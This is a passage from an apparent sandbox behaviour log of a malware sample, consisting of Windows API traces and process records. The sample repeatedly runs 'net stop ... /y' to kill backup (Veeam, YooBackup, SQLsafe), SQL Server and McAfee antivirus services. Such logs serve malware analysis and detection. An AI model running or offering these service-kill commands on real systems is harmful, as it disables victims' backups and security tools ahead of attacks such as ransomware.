-22 [0107.612] _wcsicmp (_String1="cont", _String2="YooBackup") returned -22 [0107.612] _wcsicmp (_String1="file", _String2="YooBackup") returned -19 [0107.612] _wcsicmp (_String1="files", _String2="YooBackup") returned -19 [0107.612] _wcsicmp (_String1="group", _String2="YooBackup") returned -18 [0107.612] _wcsicmp (_String1="groups", _String2="YooBackup") returned -18 [0107.612] _wcsicmp (_String1="help", _String2="YooBackup") returned -17 [0107.613] _wcsicmp (_String1="helpmsg", _String2="YooBackup") returned -17 [0107.613] _wcsicmp (_String1="localgroup", _String2="YooBackup") returned -13 [0107.613] _wcsicmp (_String1="pause", _String2="YooBackup") returned -9 [0107.613] _wcsicmp (_String1="session", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="sessions", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="sess", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="share", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="start", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="stats", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="statistics", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="stop", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="time", _String2="YooBackup") returned -5 [0107.613] _wcsicmp (_String1="user", _String2="YooBackup") returned -4 [0107.613] _wcsicmp (_String1="users", _String2="YooBackup") returned -4 [0107.613] _wcsicmp (_String1="msg", _String2="YooBackup") returned -12 [0107.613] _wcsicmp (_String1="messenger", _String2="YooBackup") returned -12 [0107.613] _wcsicmp (_String1="receiver", _String2="YooBackup") returned -7 [0107.613] _wcsicmp (_String1="rcv", _String2="YooBackup") returned -7 [0107.613] _wcsicmp (_String1="netpopup", _String2="YooBackup") returned -11 [0107.613] _wcsicmp (_String1="redirector", _String2="YooBackup") returned -7 [0107.613] _wcsicmp (_String1="redir", _String2="YooBackup") returned -7 [0107.613] _wcsicmp (_String1="rdr", _String2="YooBackup") returned -7 [0107.613] _wcsicmp (_String1="workstation", _String2="YooBackup") returned -2 [0107.613] _wcsicmp (_String1="work", _String2="YooBackup") returned -2 [0107.613] _wcsicmp (_String1="wksta", _String2="YooBackup") returned -2 [0107.613] _wcsicmp (_String1="prdr", _String2="YooBackup") returned -9 [0107.613] _wcsicmp (_String1="devrdr", _String2="YooBackup") returned -21 [0107.613] _wcsicmp (_String1="lanmanworkstation", _String2="YooBackup") returned -13 [0107.613] _wcsicmp (_String1="server", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="svr", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="srv", _String2="YooBackup") returned -6 [0107.613] _wcsicmp (_String1="lanmanserver", _String2="YooBackup") returned -13 [0107.613] _wcsicmp (_String1="alerter", _String2="YooBackup") returned -24 [0107.613] _wcsicmp (_String1="netlogon", _String2="YooBackup") returned -11 [0107.614] _wcsupr (in: _String="YooBackup" | out: _String="YOOBACKUP") returned="YOOBACKUP" [0107.614] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4b54a8 [0107.616] GetServiceKeyNameW (in: hSCManager=0x4b54a8, lpDisplayName="YOOBACKUP", lpServiceName=0x3faaf0, lpcchBuffer=0x33fe60 | out: lpServiceName="", lpcchBuffer=0x33fe60) returned 0 [0107.616] _wcsicmp (_String1="msg", _String2="YOOBACKUP") returned -12 [0107.616] _wcsicmp (_String1="messenger", _String2="YOOBACKUP") returned -12 [0107.616] _wcsicmp (_String1="receiver", _String2="YOOBACKUP") returned -7 [0107.616] _wcsicmp (_String1="rcv", _String2="YOOBACKUP") returned -7 [0107.616] _wcsicmp (_String1="redirector", _String2="YOOBACKUP") returned -7 [0107.616] _wcsicmp (_String1="redir", _String2="YOOBACKUP") returned -7 [0107.616] _wcsicmp (_String1="rdr", _String2="YOOBACKUP") returned -7 [0107.616] _wcsicmp (_String1="workstation", _String2="YOOBACKUP") returned -2 [0107.616] _wcsicmp (_String1="work", _String2="YOOBACKUP") returned -2 [0107.616] _wcsicmp (_String1="wksta", _String2="YOOBACKUP") returned -2 [0107.616] _wcsicmp (_String1="prdr", _String2="YOOBACKUP") returned -9 [0107.617] _wcsicmp (_String1="devrdr", _String2="YOOBACKUP") returned -21 [0107.617] _wcsicmp (_String1="lanmanworkstation", _String2="YOOBACKUP") returned -13 [0107.617] _wcsicmp (_String1="server", _String2="YOOBACKUP") returned -6 [0107.617] _wcsicmp (_String1="svr", _String2="YOOBACKUP") returned -6 [0107.617] _wcsicmp (_String1="srv", _String2="YOOBACKUP") returned -6 [0107.617] _wcsicmp (_String1="lanmanserver", _String2="YOOBACKUP") returned -13 [0107.617] _wcsicmp (_String1="alerter", _String2="YOOBACKUP") returned -24 [0107.617] _wcsicmp (_String1="netlogon", _String2="YOOBACKUP") returned -11 [0107.617] NetServiceControl (in: servername=0x0, service="YOOBACKUP", opcode=0x0, arg=0x0, bufptr=0x33fe5c | out: bufptr=0x33fe5c) returned 0x889 [0107.618] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.618] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.618] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.619] GetFileType (hFile=0x0) returned 0x0 [0107.619] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4b3ec0 [0107.619] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4b3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0107.619] WriteFile (in: hFile=0x0, lpBuffer=0x4b3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33fd9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fd9c, lpOverlapped=0x0) returned 0 [0107.619] LocalFree (hMem=0x4b3ec0) returned 0x0 [0107.619] GetFileType (hFile=0x0) returned 0x0 [0107.619] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6170 [0107.619] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0107.619] WriteFile (in: hFile=0x0, lpBuffer=0x4b6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fd9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fd9c, lpOverlapped=0x0) returned 0 [0107.619] LocalFree (hMem=0x4b6170) returned 0x0 [0107.619] _ultow (in: _Dest=0x889, _Radix=3407308 | out: _Dest=0x889) returned="2185" [0107.619] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.619] GetFileType (hFile=0x0) returned 0x0 [0107.620] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4b6170 [0107.620] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4b6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.620] WriteFile (in: hFile=0x0, lpBuffer=0x4b6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33fda8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fda8, lpOverlapped=0x0) returned 0 [0107.620] LocalFree (hMem=0x4b6170) returned 0x0 [0107.620] GetFileType (hFile=0x0) returned 0x0 [0107.620] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6170 [0107.620] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0107.620] WriteFile (in: hFile=0x0, lpBuffer=0x4b6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fda8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fda8, lpOverlapped=0x0) returned 0 [0107.620] LocalFree (hMem=0x4b6170) returned 0x0 [0107.620] NetApiBufferFree (Buffer=0x4b1ae0) returned 0x0 [0107.620] NetApiBufferFree (Buffer=0x4b1af8) returned 0x0 [0107.621] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop YooBackup /y" [0107.621] exit (_Code=2) Process: id = "133" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x22f4f000" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 507 os_tid = 0xf44 Process: id = "134" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x22d54000" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “SQLsafe Backup Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 508 os_tid = 0x61c Process: id = "135" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2515a000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop msftesql$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 509 os_tid = 0x874 Process: id = "136" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2345f000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 510 os_tid = 0xf5c Process: id = "137" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25a64000" os_pid = "0xf34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLServerADHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 511 os_tid = 0xf70 Process: id = "138" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25169000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 512 os_tid = 0x3f8 Process: id = "139" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2506e000" os_pid = "0x8c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 513 os_tid = 0xa04 Process: id = "140" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x22c73000" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 514 os_tid = 0xf74 Process: id = "141" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1bf78000" os_pid = "0xee0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 515 os_tid = 0x158 Process: id = "142" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x23f7d000" os_pid = "0xf84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 516 os_tid = 0xb80 Process: id = "143" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x23182000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 517 os_tid = 0xf80 Process: id = "144" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2420b000" os_pid = "0xfd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "71" os_parent_pid = "0xe20" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 518 os_tid = 0xf30 [0106.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29ff24 | out: lpSystemTimeAsFileTime=0x29ff24*(dwLowDateTime=0x146e4390, dwHighDateTime=0x1d6f0d1)) [0106.385] GetCurrentProcessId () returned 0xfd4 [0106.385] GetCurrentThreadId () returned 0xf30 [0106.385] GetTickCount () returned 0x114e7a1 [0106.385] QueryPerformanceCounter (in: lpPerformanceCount=0x29ff1c | out: lpPerformanceCount=0x29ff1c*=22548609443) returned 1 [0106.385] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0106.386] __set_app_type (_Type=0x1) [0106.386] __p__fmode () returned 0x770331f4 [0106.386] __p__commode () returned 0x770331fc [0106.386] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0106.386] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0106.386] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.386] GetConsoleOutputCP () returned 0x1b5 [0106.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0106.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.410] sprintf_s (in: _DstBuf=0x29fedc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.411] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0106.418] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.418] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0106.418] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fca8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0106.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6a3ad8 [0106.418] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.419] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29feac | out: Buffer=0x29feac*=0x6a1ae0) returned 0x0 [0106.419] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29feac | out: Buffer=0x29feac*=0x6a1af8) returned 0x0 [0106.419] _fileno (_File=0x77032900) returned -2 [0106.419] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0106.419] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.419] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.419] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.419] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.419] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.419] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.419] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.419] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.419] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.419] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.419] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.419] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.419] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.419] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.419] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.419] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.419] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.419] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.419] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.419] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.419] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.419] _wcsicmp (_String1="accounts", _String2="VeeamNFSSvc") returned -21 [0106.419] _wcsicmp (_String1="computer", _String2="VeeamNFSSvc") returned -19 [0106.419] _wcsicmp (_String1="config", _String2="VeeamNFSSvc") returned -19 [0106.419] _wcsicmp (_String1="continue", _String2="VeeamNFSSvc") returned -19 [0106.419] _wcsicmp (_String1="cont", _String2="VeeamNFSSvc") returned -19 [0106.419] _wcsicmp (_String1="file", _String2="VeeamNFSSvc") returned -16 [0106.420] _wcsicmp (_String1="files", _String2="VeeamNFSSvc") returned -16 [0106.420] _wcsicmp (_String1="group", _String2="VeeamNFSSvc") returned -15 [0106.420] _wcsicmp (_String1="groups", _String2="VeeamNFSSvc") returned -15 [0106.420] _wcsicmp (_String1="help", _String2="VeeamNFSSvc") returned -14 [0106.420] _wcsicmp (_String1="helpmsg", _String2="VeeamNFSSvc") returned -14 [0106.420] _wcsicmp (_String1="localgroup", _String2="VeeamNFSSvc") returned -10 [0106.420] _wcsicmp (_String1="pause", _String2="VeeamNFSSvc") returned -6 [0106.420] _wcsicmp (_String1="session", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="sessions", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="sess", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="share", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="start", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="stats", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="statistics", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="stop", _String2="VeeamNFSSvc") returned -3 [0106.420] _wcsicmp (_String1="time", _String2="VeeamNFSSvc") returned -2 [0106.420] _wcsicmp (_String1="user", _String2="VeeamNFSSvc") returned -1 [0106.420] _wcsicmp (_String1="users", _String2="VeeamNFSSvc") returned -1 [0106.420] _wcsicmp (_String1="msg", _String2="VeeamNFSSvc") returned -9 [0106.420] _wcsicmp (_String1="messenger", _String2="VeeamNFSSvc") returned -9 [0106.420] _wcsicmp (_String1="receiver", _String2="VeeamNFSSvc") returned -4 [0106.420] _wcsicmp (_String1="rcv", _String2="VeeamNFSSvc") returned -4 [0106.420] _wcsicmp (_String1="netpopup", _String2="VeeamNFSSvc") returned -8 [0106.420] _wcsicmp (_String1="redirector", _String2="VeeamNFSSvc") returned -4 [0106.420] _wcsicmp (_String1="redir", _String2="VeeamNFSSvc") returned -4 [0106.420] _wcsicmp (_String1="rdr", _String2="VeeamNFSSvc") returned -4 [0106.420] _wcsicmp (_String1="workstation", _String2="VeeamNFSSvc") returned 1 [0106.420] _wcsicmp (_String1="work", _String2="VeeamNFSSvc") returned 1 [0106.420] _wcsicmp (_String1="wksta", _String2="VeeamNFSSvc") returned 1 [0106.420] _wcsicmp (_String1="prdr", _String2="VeeamNFSSvc") returned -6 [0106.420] _wcsicmp (_String1="devrdr", _String2="VeeamNFSSvc") returned -18 [0106.420] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamNFSSvc") returned -10 [0106.420] _wcsicmp (_String1="server", _String2="VeeamNFSSvc") returned -3 [0106.421] _wcsicmp (_String1="svr", _String2="VeeamNFSSvc") returned -3 [0106.421] _wcsicmp (_String1="srv", _String2="VeeamNFSSvc") returned -3 [0106.421] _wcsicmp (_String1="lanmanserver", _String2="VeeamNFSSvc") returned -10 [0106.421] _wcsicmp (_String1="alerter", _String2="VeeamNFSSvc") returned -21 [0106.421] _wcsicmp (_String1="netlogon", _String2="VeeamNFSSvc") returned -8 [0106.421] _wcsupr (in: _String="VeeamNFSSvc" | out: _String="VEEAMNFSSVC") returned="VEEAMNFSSVC" [0106.421] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6a54a8 [0106.428] GetServiceKeyNameW (in: hSCManager=0x6a54a8, lpDisplayName="VEEAMNFSSVC", lpServiceName=0x3faaf0, lpcchBuffer=0x29fe48 | out: lpServiceName="", lpcchBuffer=0x29fe48) returned 0 [0106.429] _wcsicmp (_String1="msg", _String2="VEEAMNFSSVC") returned -9 [0106.429] 